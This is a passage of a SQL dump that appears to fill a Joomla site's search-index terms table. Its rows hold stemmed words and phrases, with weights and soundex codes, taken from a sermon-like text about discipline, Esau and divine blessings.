(253129, 'cheap', 'cheap', 0, 0, 0.3333, 'C100', 2, '*'),
(253130, 'cheap opportunity', 'cheap opportunity', 0, 1, 1.5667, 'C16353', 2, '*'),
(253131, 'cheap opportunity otherwise', 'cheap opportunity otherwise', 0, 1, 1.9, 'C1635362', 2, '*'),
(253132, 'children and family', 'children and family', 0, 1, 1.6333, 'C43653154', 2, '*'),
(253133, 'church and', 'church and', 0, 1, 1.3333, 'C6253', 2, '*'),
(253134, 'church and align', 'church and align', 0, 1, 1.5333, 'C6253425', 2, '*'),
(253135, 'church members', 'church members', 0, 1, 1.4667, 'C625162', 2, '*'),
(253136, 'church members are', 'church members are', 0, 1, 1.6, 'C6251626', 2, '*'),
(253137, 'come into', 'come into', 0, 1, 1.3, 'C530', 2, '*'),
(253138, 'come into and', 'come into and', 0, 1, 1.4333, 'C5353', 2, '*'),
(253139, 'comes your', 'come your', 0, 1, 1.3333, 'C526', 2, '*'),
(253140, 'comes your way', 'come your way', 0, 1, 1.4667, 'C526', 2, '*'),
(253141, 'composed', 'compos', 0, 0, 0.5333, 'C5123', 2, '*'),
(253142, 'composed an', 'compos an', 0, 1, 1.3667, 'C51235', 2, '*'),
(253143, 'composed an undisciplined', 'compos an undisciplined', 0, 1, 1.8333, 'C51235321453', 2, '*'),
(253144, 'conditions', 'condit', 0, 0, 0.6667, 'C5352', 2, '*'),
(253145, 'conditions your', 'condit your', 0, 1, 1.5, 'C53526', 2, '*'),
(253146, 'conditions your life', 'condit your life', 0, 1, 1.6667, 'C5352641', 2, '*'),
(253147, 'consumed', 'consum', 0, 0, 0.5333, 'C5253', 2, '*'),
(253148, 'consumed your', 'consum your', 0, 1, 1.4333, 'C52536', 2, '*'),
(253149, 'consumed your destiny', 'consum your destiny', 0, 1, 1.7, 'C525363235', 2, '*'),
(253150, 'controls', 'control', 0, 0, 0.5333, 'C53642', 2, '*'),
(253151, 'controls and', 'control and', 0, 1, 1.4, 'C5364253', 2, '*'),
(253152, 'controls and affects', 'control and affects', 0, 1, 1.6667, 'C53642531232', 2, '*'),
(253153, 'corrects you moulds', 'correct you moulds', 0, 1, 1.6333, 'C62325432', 2, '*'),
(253154, 'could not discipline', 'could not discipline', 0, 1, 1.6667, 'C43532145', 2, '*'),
(253155, 'demons', 'demon', 0, 0, 0.4, 'D520', 2, '*'),
(253156, 'demons to', 'demon to', 0, 1, 1.3, 'D523', 2, '*'),
(253157, 'demons to enter', 'demon to enter', 0, 1, 1.5, 'D523536', 2, '*'),
(253158, 'desires', 'desir', 0, 0, 0.4667, 'D262', 2, '*'),
(253159, 'desires beloved', 'desir beloved', 0, 1, 1.5, 'D2621413', 2, '*'),
(253160, 'desires beloved you', 'desir beloved you', 0, 1, 1.6333, 'D2621413', 2, '*'),
(253161, 'desires emotions', 'desir emotions', 0, 1, 1.5333, 'D2625352', 2, '*'),
(253162, 'desires emotions and', 'desir emotions and', 0, 1, 1.6667, 'D262535253', 2, '*'),
(253163, 'destiny discipline', 'destini discipline', 0, 1, 1.6, 'D23532145', 2, '*'),
(253164, 'destiny discipline brings', 'destini discipline brings', 0, 1, 1.8333, 'D235321451652', 2, '*'),
(253165, 'destiny overnight', 'destini overnight', 0, 1, 1.5667, 'D23516523', 2, '*'),
(253166, 'destiny overnight discipline', 'destini overnight discipline', 0, 1, 1.9333, 'D235165232145', 2, '*'),
(253167, 'destiny till', 'destini till', 0, 1, 1.4, 'D23534', 2, '*'),
(253168, 'destiny till next', 'destini till next', 0, 1, 1.5667, 'D23534523', 2, '*'),
(253169, 'difficult indiscipline', 'difficult indiscipline', 0, 1, 1.7333, 'D1243532145', 2, '*'),
(253170, 'difficult indiscipline wastes', 'difficult indiscipline wastes', 0, 1, 1.9667, 'D1243532145232', 2, '*'),
(253171, 'difficult to help', 'difficult to help', 0, 1, 1.5667, 'D124341', 2, '*'),
(253172, 'difficult to obey', 'difficult to obey', 0, 1, 1.5667, 'D12431', 2, '*'),
(253173, 'dignity', 'digniti', 0, 0, 0.4667, 'D253', 2, '*'),
(253174, 'dignity respect', 'digniti respect', 0, 1, 1.5, 'D25362123', 2, '*'),
(253175, 'dignity respect and', 'digniti respect and', 0, 1, 1.6333, 'D2536212353', 2, '*'),
(253176, 'disaster', 'disast', 0, 0, 0.5333, 'D236', 3, '*'),
(253177, 'disaster going', 'disast going', 0, 1, 1.4667, 'D236252', 2, '*'),
(253178, 'disaster going somewhere', 'disast going somewhere', 0, 1, 1.8, 'D23625256', 2, '*'),
(253179, 'discipleship', 'discipleship', 0, 0, 0.8, 'D21421', 3, '*'),
(253180, 'discipleship that', 'discipleship that', 0, 1, 1.5667, 'D214213', 2, '*'),
(253181, 'discipleship that is', 'discipleship that is', 0, 1, 1.6667, 'D2142132', 2, '*'),
(253182, 'discipleship that works', 'discipleship that works', 0, 1, 1.7667, 'D21421362', 2, '*'),
(253183, 'discipline also', 'disciplin also', 0, 1, 1.5, 'D214542', 2, '*'),
(253184, 'discipline also brings', 'disciplin also brings', 0, 1, 1.7333, 'D2145421652', 2, '*'),
(253185, 'discipline brings', 'disciplin brings', 0, 1, 1.5667, 'D21451652', 2, '*'),
(253186, 'discipline brings divine', 'disciplin brings divine', 0, 1, 1.8, 'D21451652315', 2, '*'),
(253187, 'discipline his', 'disciplin his', 0, 1, 1.4667, 'D21452', 2, '*'),
(253188, 'discipline his appetites', 'disciplin his appetites', 0, 1, 1.8, 'D21452132', 2, '*'),
(253189, 'discipline into', 'disciplin into', 0, 1, 1.5, 'D21453', 2, '*'),
(253190, 'discipline into the', 'disciplin into the', 0, 1, 1.6333, 'D21453', 2, '*'),
(253191, 'discipline is', 'disciplin is', 0, 1, 1.4333, 'D21452', 2, '*'),
(253192, 'discipline is part', 'disciplin is part', 0, 1, 1.6, 'D21452163', 2, '*'),
(253193, 'discipline is what', 'disciplin is what', 0, 1, 1.6, 'D214523', 2, '*'),
(253194, 'discipline it', 'disciplin it', 0, 1, 1.4333, 'D21453', 2, '*'),
(253195, 'discipline it is', 'disciplin it is', 0, 1, 1.5333, 'D214532', 2, '*'),
(253196, 'discipline makes', 'disciplin makes', 0, 1, 1.5333, 'D21452', 2, '*'),
(253197, 'discipline makes you', 'disciplin makes you', 0, 1, 1.6667, 'D21452', 2, '*'),
(253200, 'discipline on', 'disciplin on', 0, 1, 1.4333, 'D2145', 2, '*'),
(253201, 'discipline on the', 'disciplin on the', 0, 1, 1.5667, 'D21453', 2, '*'),
(253202, 'discipline to', 'disciplin to', 0, 1, 1.4333, 'D21453', 2, '*'),
(253203, 'discipline to be', 'disciplin to be', 0, 1, 1.5333, 'D214531', 2, '*'),
(253204, 'discipline your body', 'disciplin your body', 0, 1, 1.6667, 'D2145613', 2, '*'),
(253205, 'discipline your life', 'disciplin your life', 0, 1, 1.6667, 'D2145641', 2, '*'),
(253206, 'disciplined', 'disciplin', 0, 0, 0.7333, 'D21453', 2, '*'),
(253207, 'disciplined man', 'disciplin man', 0, 1, 1.5, 'D214535', 2, '*'),
(253208, 'disciplined man will', 'disciplin man will', 0, 1, 1.6667, 'D2145354', 2, '*'),
(253209, 'disciplined means', 'disciplin means', 0, 1, 1.5667, 'D2145352', 2, '*'),
(253210, 'disciplined means to', 'disciplin means to', 0, 1, 1.6667, 'D21453523', 2, '*'),
(253211, 'disciplined they', 'disciplin they', 0, 1, 1.5333, 'D21453', 2, '*'),
(253212, 'disciplined they may', 'disciplin they may', 0, 1, 1.6667, 'D214535', 2, '*'),
(253213, 'disorder', 'disord', 0, 0, 0.5333, 'D2636', 2, '*'),
(253214, 'disorder and', 'disord and', 0, 1, 1.4, 'D263653', 2, '*'),
(253215, 'disorder and chaos', 'disord and chaos', 0, 1, 1.6, 'D2636532', 2, '*'),
(253216, 'divine blessings', 'divin blessings', 0, 1, 1.5333, 'D1514252', 2, '*'),
(253217, 'divine blessings to', 'divin blessings to', 0, 1, 1.6333, 'D15142523', 2, '*'),
(253218, 'divine discipleship', 'divin discipleship', 0, 1, 1.6333, 'D15321421', 2, '*'),
(253219, 'divine discipleship that', 'divin discipleship that', 0, 1, 1.8, 'D153214213', 2, '*'),
(253220, 'divine intervention difficult', 'divin intervention difficult', 0, 1, 1.9667, 'D1536153531243', 2, '*'),
(253221, 'divine order', 'divin order', 0, 1, 1.4, 'D15636', 2, '*'),
(253222, 'divine order into', 'divin order into', 0, 1, 1.5667, 'D1563653', 2, '*'),
(253223, 'divinely', 'divin', 0, 0, 0.5333, 'D154', 3, '*'),
(253224, 'divinely respected', 'divin respected', 0, 1, 1.6, 'D15462123', 2, '*'),
(253225, 'divinely respected people', 'divin respected people', 0, 1, 1.8333, 'D1546212314', 2, '*'),
(253226, 'do but', 'do but', 0, 1, 1.2, 'D130', 3, '*'),
(253227, 'do but there', 'do but there', 0, 1, 1.4, 'D136', 2, '*'),
(253228, 'don\'t just eat', 'don just eat', 0, 1, 1.4667, 'D5323', 2, '*'),
(253229, 'dream centre we', 'dream centre we', 0, 1, 1.5, 'D652536', 2, '*'),
(253230, 'earth are', 'earth are', 0, 1, 1.3, 'E636', 2, '*'),
(253231, 'earth are people', 'earth are people', 0, 1, 1.5333, 'E63614', 2, '*'),
(253232, 'easiest thing', 'easiest thing', 0, 1, 1.4333, 'E2352', 2, '*'),
(253233, 'easiest thing to', 'easiest thing to', 0, 1, 1.5333, 'E23523', 2, '*'),
(253234, 'eat every', 'eat every', 0, 1, 1.3, 'E316', 2, '*'),
(253235, 'eat every food', 'eat every food', 0, 1, 1.4667, 'E31613', 2, '*'),
(253236, 'embrace discipline', 'embrac discipline', 0, 1, 1.6, 'E516232145', 2, '*'),
(253237, 'embrace discipline to', 'embrac discipline to', 0, 1, 1.7, 'E5162321453', 2, '*'),
(253238, 'embrace structure', 'embrac structure', 0, 1, 1.5667, 'E516236236', 2, '*'),
(253239, 'embrace structure in', 'embrac structure in', 0, 1, 1.6667, 'E5162362365', 2, '*'),
(253240, 'emotions and', 'emot and', 0, 1, 1.4, 'E535253', 2, '*'),
(253241, 'emotions and appetites', 'emot and appetites', 0, 1, 1.7333, 'E535253132', 2, '*'),
(253242, 'energy', 'energi', 0, 0, 0.4, 'E562', 2, '*'),
(253243, 'energy indiscipline', 'energi indiscipline', 0, 1, 1.6333, 'E562532145', 2, '*'),
(253244, 'energy indiscipline can', 'energi indiscipline can', 0, 1, 1.7667, 'E56253214525', 2, '*'),
(253245, 'enter your', 'enter your', 0, 1, 1.3333, 'E536', 2, '*'),
(253246, 'enter your life', 'enter your life', 0, 1, 1.5, 'E53641', 2, '*'),
(253247, 'esau', 'esau', 0, 0, 0.2667, 'E200', 2, '*'),
(253248, 'esau lost', 'esau lost', 0, 1, 1.3, 'E2423', 2, '*'),
(253249, 'esau lost all', 'esau lost all', 0, 1, 1.4333, 'E24234', 2, '*'),
(253250, 'esau or', 'esau or', 0, 1, 1.2333, 'E260', 2, '*'),
(253251, 'esau or jump', 'esau or jump', 0, 1, 1.4, 'E26251', 2, '*'),
(253252, 'especially if', 'especi if', 0, 1, 1.4333, 'E21241', 2, '*'),
(253253, 'especially if you', 'especi if you', 0, 1, 1.5667, 'E21241', 2, '*'),
(253254, 'eventually become', 'eventu become', 0, 1, 1.5667, 'E1534125', 2, '*'),
(253255, 'eventually become victims', 'eventu become victims', 0, 1, 1.8333, 'E153412512352', 2, '*'),
(253256, 'every cheap', 'everi cheap', 0, 1, 1.3667, 'E1621', 2, '*'),
(253257, 'every cheap opportunity', 'everi cheap opportunity', 0, 1, 1.7667, 'E16216353', 2, '*'),
(253258, 'every food', 'everi food', 0, 1, 1.3333, 'E1613', 2, '*'),
(253259, 'every food that', 'everi food that', 0, 1, 1.5, 'E1613', 2, '*'),
(253260, 'fabric', 'fabric', 0, 0, 0.4, 'F620', 2, '*'),
(253261, 'fabric of', 'fabric of', 0, 1, 1.3, 'F621', 2, '*'),
(253262, 'fabric of your', 'fabric of your', 0, 1, 1.4667, 'F6216', 2, '*'),
(253263, 'family of', 'famili of', 0, 1, 1.3, 'F541', 2, '*'),
(253264, 'family of a', 'famili of a', 0, 1, 1.3667, 'F541', 2, '*'),
(253265, 'family of an', 'famili of an', 0, 1, 1.4, 'F5415', 2, '*'),
(253267, 'fit for god\'s', 'fit for god', 0, 1, 1.4333, 'F316232', 2, '*'),
(253268, 'food that', 'food that', 0, 1, 1.3, 'F300', 2, '*'),
(253269, 'food that comes', 'food that comes', 0, 1, 1.5, 'F3252', 2, '*'),
(253270, 'for divine blessings', 'for divine blessings', 0, 1, 1.6667, 'F631514252', 2, '*'),
(253271, 'for god\'s plan', 'for god plan', 0, 1, 1.4667, 'F6232145', 2, '*'),
(253272, 'for life\'s', 'for life', 0, 1, 1.3333, 'F6412', 2, '*'),
(253273, 'for life\'s matters', 'for life matters', 0, 1, 1.6, 'F64125362', 2, '*'),
(253274, 'for over', 'for over', 0, 1, 1.2667, 'F616', 2, '*'),
(253275, 'for over and', 'for over and', 0, 1, 1.4, 'F61653', 2, '*'),
(253276, 'for the good', 'for the good', 0, 1, 1.4, 'F6323', 2, '*'),
(253277, 'for your good', 'for your good', 0, 1, 1.4333, 'F623', 2, '*'),
(253278, 'from working', 'from working', 0, 1, 1.4, 'F656252', 2, '*'),
(253279, 'from working makes', 'from working makes', 0, 1, 1.6, 'F65625252', 2, '*'),
(253282, 'going somewhere', 'go somewhere', 0, 1, 1.5, 'G5256', 2, '*'),
(253283, 'going somewhere to', 'go somewhere to', 0, 1, 1.6, 'G52563', 2, '*'),
(253284, 'good and for', 'good and for', 0, 1, 1.4, 'G35316', 2, '*'),
(253285, 'good of', 'good of', 0, 1, 1.2333, 'G310', 3, '*'),
(253286, 'good of your', 'good of your', 0, 1, 1.4, 'G316', 2, '*'),
(253287, 'great benefits', 'great benefits', 0, 1, 1.4667, 'G6315132', 2, '*'),
(253288, 'great benefits when', 'great benefits when', 0, 1, 1.6333, 'G63151325', 2, '*'),
(253289, 'had the birthright', 'had the birthright', 0, 1, 1.6, 'H3163623', 2, '*'),
(253290, 'had to his', 'had to his', 0, 1, 1.3333, 'H320', 2, '*'),
(253291, 'had to pray', 'had to pray', 0, 1, 1.3667, 'H316', 2, '*'),
(253292, 'hand makes', 'hand makes', 0, 1, 1.3333, 'H5352', 2, '*'),
(253293, 'hand makes you', 'hand makes you', 0, 1, 1.4667, 'H5352', 2, '*'),
(253294, 'happen the', 'happen the', 0, 1, 1.3333, 'H153', 2, '*'),
(253295, 'happen the children', 'happen the children', 0, 1, 1.6333, 'H15324365', 2, '*'),
(253296, 'has nothing in', 'ha nothing in', 0, 1, 1.4667, 'H253525', 2, '*'),
(253297, 'have accepted', 'have accepted', 0, 1, 1.4333, 'H1213', 2, '*'),
(253298, 'have accepted discipleship', 'have accepted discipleship', 0, 1, 1.8667, 'H121321421', 2, '*'),
(253299, 'have consumed', 'have consumed', 0, 1, 1.4333, 'H125253', 2, '*'),
(253300, 'have consumed your', 'have consumed your', 0, 1, 1.6, 'H1252536', 2, '*'),
(253301, 'have internalised', 'have internalised', 0, 1, 1.5667, 'H15365423', 2, '*'),
(253302, 'have internalised it', 'have internalised it', 0, 1, 1.6667, 'H15365423', 2, '*'),
(253303, 'he could not', 'he could not', 0, 1, 1.4, 'H24353', 2, '*'),
(253304, 'he had the', 'he had the', 0, 1, 1.3333, 'H300', 2, '*'),
(253305, 'he had to', 'he had to', 0, 1, 1.3, 'H300', 2, '*'),
(253308, 'heart make', 'heart make', 0, 1, 1.3333, 'H6352', 2, '*'),
(253309, 'heart make up', 'heart make up', 0, 1, 1.4333, 'H63521', 2, '*'),
(253310, 'heir', 'heir', 0, 0, 0.2667, 'H600', 2, '*'),
(253311, 'heir by', 'heir by', 0, 1, 1.2333, 'H610', 2, '*'),
(253312, 'heir by birth', 'heir by birth', 0, 1, 1.4333, 'H6163', 2, '*'),
(253313, 'help they', 'help they', 0, 1, 1.3, 'H413', 2, '*'),
(253314, 'help they are', 'help they are', 0, 1, 1.4333, 'H4136', 2, '*'),
(253315, 'hinders', 'hinder', 0, 0, 0.4667, 'H5362', 2, '*'),
(253316, 'hinders angels', 'hinder angels', 0, 1, 1.4667, 'H53625242', 2, '*'),
(253317, 'hinders angels from', 'hinder angels from', 0, 1, 1.6333, 'H53625242165', 2, '*'),
(253318, 'his appetites', 'hi appetites', 0, 1, 1.4333, 'H2132', 2, '*'),
(253319, 'his appetites and', 'hi appetites and', 0, 1, 1.5667, 'H213253', 2, '*'),
(253320, 'his brother', 'hi brother', 0, 1, 1.3667, 'H21636', 2, '*'),
(253321, 'his brother because', 'hi brother because', 0, 1, 1.6333, 'H2163612', 2, '*'),
(253322, 'honour into', 'honour into', 0, 1, 1.3667, 'H5653', 3, '*'),
(253323, 'honour into your', 'honour into your', 0, 1, 1.5333, 'H56536', 3, '*'),
(253324, 'house of training', 'hous of training', 0, 1, 1.5667, 'H213652', 2, '*'),
(253325, 'if you respond', 'if you respond', 0, 1, 1.4667, 'I162153', 2, '*'),
(253326, 'in church and', 'in church and', 0, 1, 1.4333, 'I526253', 2, '*'),
(253327, 'in life such', 'in life such', 0, 1, 1.4, 'I5412', 2, '*'),
(253328, 'in you it', 'in you it', 0, 1, 1.3, 'I530', 2, '*'),
(253329, 'indiscipline', 'indisciplin', 0, 0, 0.8, 'I532145', 2, '*'),
(253330, 'indiscipline can', 'indisciplin can', 0, 1, 1.5333, 'I53214525', 2, '*'),
(253331, 'indiscipline can reduce', 'indisciplin can reduce', 0, 1, 1.7667, 'I53214525632', 2, '*'),
(253332, 'indiscipline he', 'indisciplin he', 0, 1, 1.5, 'I532145', 2, '*'),
(253333, 'indiscipline he was', 'indisciplin he was', 0, 1, 1.6333, 'I5321452', 2, '*'),
(253334, 'indiscipline hinders', 'indisciplin hinders', 0, 1, 1.6667, 'I532145362', 2, '*'),
(253335, 'indiscipline hinders angels', 'indisciplin hinders angels', 0, 1, 1.9, 'I5321453625242', 2, '*'),
(253336, 'indiscipline leads', 'indisciplin leads', 0, 1, 1.6, 'I532145432', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(253337, 'indiscipline leads to', 'indisciplin leads to', 0, 1, 1.7, 'I5321454323', 2, '*'),
(253338, 'indiscipline wastes', 'indisciplin wastes', 0, 1, 1.6333, 'I532145232', 2, '*'),
(253339, 'indiscipline wastes resources', 'indisciplin wastes resources', 0, 1, 1.9667, 'I5321452326262', 2, '*'),
(253340, 'inside to', 'insid to', 0, 1, 1.3, 'I523', 2, '*'),
(253341, 'inside to training', 'insid to training', 0, 1, 1.6, 'I523652', 2, '*'),
(253342, 'instructions and', 'instruct and', 0, 1, 1.5333, 'I5236235253', 3, '*'),
(253343, 'instructions and they', 'instruct and they', 0, 1, 1.7, 'I5236235253', 2, '*'),
(253344, 'internalised', 'internalis', 0, 0, 0.8, 'I5365423', 2, '*'),
(253345, 'internalised it', 'internalis it', 0, 1, 1.5, 'I5365423', 2, '*'),
(253346, 'internalised it such', 'internalis it such', 0, 1, 1.6667, 'I53654232', 2, '*'),
(253347, 'intervention difficult', 'intervent difficult', 0, 1, 1.7333, 'I536153531243', 2, '*'),
(253348, 'intervention difficult indiscipline', 'intervent difficult indiscipline', 0, 1, 2, 'I536153531243532145', 2, '*'),
(253349, 'into and', 'into and', 0, 1, 1.2667, 'I5353', 2, '*'),
(253350, 'into and remain', 'into and remain', 0, 1, 1.5, 'I535365', 2, '*'),
(253351, 'into the fabric', 'into the fabric', 0, 1, 1.5, 'I53162', 2, '*'),
(253352, 'is a disaster', 'is a disaster', 0, 1, 1.4333, 'I23236', 2, '*'),
(253353, 'is a set', 'is a set', 0, 1, 1.2667, 'I230', 2, '*'),
(253354, 'is for your', 'is for your', 0, 1, 1.3667, 'I216', 2, '*'),
(253355, 'is part', 'is part', 0, 1, 1.2333, 'I2163', 2, '*'),
(253356, 'is part of', 'is part of', 0, 1, 1.3333, 'I21631', 2, '*'),
(253357, 'is supplied to', 'is supplied to', 0, 1, 1.4667, 'I2143', 2, '*'),
(253358, 'is what conditions', 'is what conditions', 0, 1, 1.6, 'I2325352', 2, '*'),
(253359, 'issues discipline', 'issu discipline', 0, 1, 1.5667, 'I232145', 2, '*'),
(253360, 'issues discipline makes', 'issu discipline makes', 0, 1, 1.7667, 'I2321452', 2, '*'),
(253361, 'it controls', 'it controls', 0, 1, 1.3667, 'I3253642', 2, '*'),
(253362, 'it controls and', 'it controls and', 0, 1, 1.5, 'I325364253', 2, '*'),
(253363, 'it esau', 'it esau', 0, 1, 1.2333, 'I320', 2, '*'),
(253364, 'it esau lost', 'it esau lost', 0, 1, 1.4, 'I32423', 2, '*'),
(253365, 'it is for', 'it is for', 0, 1, 1.3, 'I3216', 2, '*'),
(253366, 'it means adjusting', 'it means adjusting', 0, 1, 1.6, 'I35232352', 2, '*'),
(253367, 'it means that', 'it means that', 0, 1, 1.4333, 'I3523', 2, '*'),
(253368, 'it such', 'it such', 0, 1, 1.2333, 'I320', 2, '*'),
(253369, 'it such that', 'it such that', 0, 1, 1.4, 'I323', 2, '*'),
(253370, 'it the dream', 'it the dream', 0, 1, 1.4, 'I365', 2, '*'),
(253373, 'jump', 'jump', 0, 0, 0.2667, 'J510', 2, '*'),
(253374, 'jump at', 'jump at', 0, 1, 1.2333, 'J513', 2, '*'),
(253375, 'jump at every', 'jump at every', 0, 1, 1.4333, 'J51316', 2, '*'),
(253376, 'just eat', 'just eat', 0, 1, 1.2667, 'J300', 2, '*'),
(253377, 'just eat every', 'just eat every', 0, 1, 1.4667, 'J316', 2, '*'),
(253379, 'kinds of opportunistic', 'kind of opportunistic', 0, 1, 1.7333, 'K5321635232', 2, '*'),
(253380, 'kingdom discipline', 'kingdom discipline', 0, 1, 1.6, 'K523532145', 2, '*'),
(253381, 'kingdom discipline into', 'kingdom discipline into', 0, 1, 1.7667, 'K5235321453', 2, '*'),
(253382, 'leads to shame', 'lead to shame', 0, 1, 1.4667, 'L32325', 2, '*'),
(253383, 'life and affairs', 'life and affairs', 0, 1, 1.5333, 'L153162', 2, '*'),
(253384, 'life becomes', 'life becomes', 0, 1, 1.4, 'L1252', 2, '*'),
(253385, 'life becomes porous', 'life becomes porous', 0, 1, 1.6333, 'L1252162', 2, '*'),
(253386, 'life discipline', 'life discipline', 0, 1, 1.5, 'L132145', 2, '*'),
(253387, 'life discipline is', 'life discipline is', 0, 1, 1.6, 'L1321452', 2, '*'),
(253388, 'life for', 'life for', 0, 1, 1.2667, 'L160', 2, '*'),
(253389, 'life for divine', 'life for divine', 0, 1, 1.5, 'L16315', 2, '*'),
(253390, 'life such', 'life such', 0, 1, 1.3, 'L120', 2, '*'),
(253391, 'life such a', 'life such a', 0, 1, 1.3667, 'L120', 2, '*'),
(253392, 'life the most', 'life the most', 0, 1, 1.4333, 'L13523', 2, '*'),
(253393, 'life with it', 'life with it', 0, 1, 1.4, 'L130', 2, '*'),
(253394, 'life\'s', 'life', 0, 0, 0.4, 'L120', 2, '*'),
(253395, 'life\'s matters', 'life matters', 0, 1, 1.4667, 'L125362', 2, '*'),
(253396, 'life\'s matters and', 'life matters and', 0, 1, 1.6, 'L12536253', 2, '*'),
(253397, 'like esau', 'like esau', 0, 1, 1.3, 'L200', 2, '*'),
(253398, 'like esau or', 'like esau or', 0, 1, 1.4, 'L260', 2, '*'),
(253399, 'lost all', 'lost all', 0, 1, 1.2667, 'L234', 2, '*'),
(253400, 'lost all that', 'lost all that', 0, 1, 1.4333, 'L2343', 2, '*'),
(253401, 'loved by', 'love by', 0, 1, 1.2667, 'L131', 2, '*'),
(253402, 'loved by all', 'love by all', 0, 1, 1.4, 'L1314', 2, '*'),
(253403, 'makes divine', 'make divine', 0, 1, 1.4, 'M2315', 2, '*'),
(253404, 'makes divine intervention', 'make divine intervention', 0, 1, 1.8333, 'M2315361535', 2, '*'),
(253405, 'makes you composed', 'make you composed', 0, 1, 1.6, 'M25123', 2, '*'),
(253406, 'makes you mature', 'make you mature', 0, 1, 1.5333, 'M2536', 2, '*'),
(253407, 'makes you ready', 'make you ready', 0, 1, 1.5, 'M263', 2, '*'),
(253408, 'makes you richer', 'make you richer', 0, 1, 1.5333, 'M2626', 2, '*'),
(253409, 'makes you stronger', 'make you stronger', 0, 1, 1.6, 'M236526', 2, '*'),
(253410, 'man has nothing', 'man has nothing', 0, 1, 1.5, 'M25352', 2, '*'),
(253411, 'man is a', 'man is a', 0, 1, 1.2667, 'M200', 2, '*'),
(253412, 'man to a', 'man to a', 0, 1, 1.2667, 'M300', 2, '*'),
(253413, 'man will always', 'man will always', 0, 1, 1.5, 'M420', 2, '*'),
(253414, 'matters and', 'matter and', 0, 1, 1.3667, 'M36253', 2, '*'),
(253415, 'matters and issues', 'matter and issues', 0, 1, 1.6, 'M362532', 2, '*'),
(253416, 'mature makes', 'matur makes', 0, 1, 1.4, 'M3652', 2, '*'),
(253417, 'mature makes you', 'matur makes you', 0, 1, 1.5333, 'M3652', 2, '*'),
(253418, 'may not be', 'mai not be', 0, 1, 1.3333, 'M310', 5, '*'),
(253422, 'means adjusting', 'mean adjusting', 0, 1, 1.5, 'M232352', 2, '*'),
(253423, 'means adjusting inside', 'mean adjusting inside', 0, 1, 1.7333, 'M232352523', 2, '*'),
(253424, 'means that', 'mean that', 0, 1, 1.3333, 'M230', 2, '*'),
(253425, 'means that you', 'mean that you', 0, 1, 1.4667, 'M230', 2, '*'),
(253426, 'means to receive', 'mean to receive', 0, 1, 1.5333, 'M23621', 2, '*'),
(253427, 'members are', 'member are', 0, 1, 1.3667, 'M1626', 2, '*'),
(253428, 'members are the', 'member are the', 0, 1, 1.5, 'M16263', 2, '*'),
(253429, 'might have', 'might have', 0, 1, 1.3333, 'M231', 2, '*'),
(253430, 'might have consumed', 'might have consumed', 0, 1, 1.6333, 'M23125253', 2, '*'),
(253431, 'mind to take', 'mind to take', 0, 1, 1.4, 'M320', 2, '*'),
(253432, 'moral character', 'moral character', 0, 1, 1.5, 'M6426236', 2, '*'),
(253433, 'moral character and', 'moral character and', 0, 1, 1.6333, 'M642623653', 2, '*'),
(253434, 'most divinely', 'most divinely', 0, 1, 1.4333, 'M23154', 2, '*'),
(253435, 'most divinely respected', 'most divinely respected', 0, 1, 1.7667, 'M2315462123', 2, '*'),
(253436, 'moulds', 'mould', 0, 0, 0.4, 'M432', 2, '*'),
(253437, 'moulds you', 'mould you', 0, 1, 1.3333, 'M432', 2, '*'),
(253438, 'moulds you or', 'mould you or', 0, 1, 1.4333, 'M4326', 2, '*'),
(253439, 'not be loved', 'not be loved', 0, 1, 1.4, 'N31413', 2, '*'),
(253440, 'not discipline', 'not discipline', 0, 1, 1.4667, 'N32145', 2, '*'),
(253441, 'not discipline his', 'not discipline his', 0, 1, 1.6, 'N321452', 2, '*'),
(253442, 'nothing in', 'noth in', 0, 1, 1.3333, 'N3525', 2, '*'),
(253443, 'nothing in life', 'noth in life', 0, 1, 1.5, 'N352541', 2, '*'),
(253444, 'obey instructions', 'obei instructions', 0, 1, 1.5667, 'O152362352', 2, '*'),
(253445, 'obey instructions and', 'obei instructions and', 0, 1, 1.7, 'O15236235253', 2, '*'),
(253446, 'of a disciplined', 'of a disciplined', 0, 1, 1.5333, 'O1321453', 2, '*'),
(253447, 'of an undisciplined', 'of an undisciplined', 0, 1, 1.6333, 'O15321453', 2, '*'),
(253450, 'of divine discipleship', 'of divine discipleship', 0, 1, 1.7333, 'O1315321421', 2, '*'),
(253452, 'of indiscipline', 'of indiscipline', 0, 1, 1.5, 'O1532145', 2, '*'),
(253453, 'of indiscipline he', 'of indiscipline he', 0, 1, 1.6, 'O1532145', 2, '*'),
(253454, 'of opportunistic', 'of opportunistic', 0, 1, 1.5333, 'O1635232', 2, '*'),
(253455, 'of opportunistic demons', 'of opportunistic demons', 0, 1, 1.7667, 'O1635232352', 2, '*'),
(253456, 'of training a', 'of training a', 0, 1, 1.4333, 'O13652', 2, '*'),
(253457, 'of values', 'of values', 0, 1, 1.3, 'O142', 2, '*'),
(253458, 'of values and', 'of values and', 0, 1, 1.4333, 'O14253', 2, '*'),
(253459, 'of what is', 'of what is', 0, 1, 1.3333, 'O132', 2, '*'),
(253460, 'of your soul', 'of your soul', 0, 1, 1.4, 'O1624', 2, '*'),
(253461, 'on earth are', 'on earth are', 0, 1, 1.4, 'O5636', 2, '*'),
(253462, 'on the other', 'on the other', 0, 1, 1.4, 'O536', 2, '*'),
(253463, 'ones that', 'on that', 0, 1, 1.3, 'O523', 2, '*'),
(253464, 'ones that pastor', 'on that pastor', 0, 1, 1.5333, 'O5231236', 2, '*'),
(253465, 'ones who', 'on who', 0, 1, 1.2667, 'O520', 2, '*'),
(253466, 'ones who are', 'on who are', 0, 1, 1.4, 'O526', 2, '*'),
(253467, 'open to', 'open to', 0, 1, 1.2333, 'O153', 2, '*'),
(253468, 'open to all', 'open to all', 0, 1, 1.3667, 'O1534', 2, '*'),
(253469, 'opportunistic', 'opportunist', 0, 0, 0.8667, 'O1635232', 2, '*'),
(253470, 'opportunistic demons', 'opportunist demons', 0, 1, 1.6667, 'O1635232352', 2, '*'),
(253471, 'opportunistic demons to', 'opportunist demons to', 0, 1, 1.7667, 'O16352323523', 2, '*'),
(253472, 'opportunity otherwise', 'opportun otherwise', 0, 1, 1.7, 'O1635362', 2, '*'),
(253473, 'opportunity otherwise you', 'opportun otherwise you', 0, 1, 1.8333, 'O1635362', 2, '*'),
(253474, 'or jump', 'or jump', 0, 1, 1.2333, 'O6251', 2, '*'),
(253475, 'or jump at', 'or jump at', 0, 1, 1.3333, 'O62513', 2, '*'),
(253476, 'or perfects', 'or perfects', 0, 1, 1.3667, 'O6161232', 2, '*'),
